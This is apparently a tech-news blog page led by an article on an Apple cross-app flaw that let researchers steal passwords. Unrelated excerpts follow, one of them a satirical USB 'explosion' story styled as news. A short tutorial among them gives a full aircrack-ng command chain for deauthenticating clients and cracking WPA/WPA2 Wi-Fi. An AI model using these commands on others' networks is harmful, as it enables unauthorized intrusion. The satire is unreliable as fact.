A huge security flaw has been discovered in Apple devices that could allow hackers to steal your passwords and data

A group of security researchers have discovered an alarming vulnerability in Apple's mobile and desktop operating systems.

In a newly-released paper, the research group explained how they tested a series of attacks that were able to bypass security checks, steal passwords, and even critical app data.

The vulnerability was discovered to exist on Apple devices including the iPhone, iPad, and Mac computers.

Due to the way Apple built apps to communicate with each other, the paper writes, researchers were able to "steal such confidential information as the passwords for iCloud, email and bank, and the secret token of Evernote."

Basically, these researchers were able to build a malware that was uploaded to Apple's App Store in the form of a typical app, which was then able to steal credentials from the existing apps on the researchers' phones. These credentials include passwords and other precious app data that's supposed to be off-limits.

The lead researcher, Luyi Xing, told the Register that his team was able to "gain unauthorized access to other apps' sensitive data such as passwords and tokens from iCloud, Mail app and all web passwords stored by Google Chrome."

According to the Register, Xing and his team informed Apple, which asked for six months to deal with issue. The six months have now passed and the vulnerabilities persist, say the researchers.

The ramifications of these findings could be huge. Very little has been written about the potential cross-app vulnerabilities in Apple's software, and this discovery shows some huge holes certainly exist.

The researchers tested this type of attack with large sample of Apple apps and found that "more than 88.6%" were completely exposed. These include extremely popular apps like password manager 1Password and Google Chrome.

"The consequences of these attacks are serious," the paper concludes, "including leak of user passwords, secrete tokens and all kinds of sensitive documents."

In short, this vulnerability could quickly become bad news for Apple if hackers or other malicious parties take advantage of the security holes, and there's no way to know if any attacks utilizing this method have already been carried out. For Apple's part, the company needs to figure out a way to patch the vulnerability across both its iOS and Mac OS X operating systems.

Business Insider has reached out to Apple, and we will update the post when we hear back.

You can watch a video showcasing how a malicious app can utilize the vulnerability to steal stored passwords from Google Chrome.

Comments

Building a smarter home

The Jetsons presented a highly entertaining vision of what homes of the future would look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s homes and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019, companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0 airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Airbnb will open its Cuba listings to users outside the United States

Airbnb will now let travelers from outside the U.S. to book properties in Cuba after receiving authorization from the U.S. government, reports the Associated Press . Previously, only Americans were allowed to reserve the site’s Cuban listings . They will open to international users on April 2. Airbnb launched its Cuban operations in April 2014 , four months after the Obama administration revealed that it will begin to restore diplomatic relations with the Communist country . The historic policy change means that travel and trade sanctions will be lifted , which is expected to boost tourism to Cuba dramatically because Americans no longer need licenses to visit. In fact, President Obama is currently on an official visit to Cuba , the first president since Calvin Coolidge to do so. According to the AP, Cuba is currently Airbnb’s fastest-growing market, with about 4,000 homes added since it opened listings. Other travel businesses...

Careless USB removal causes multiple deaths

EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...

Exciting Technology

Search This Blog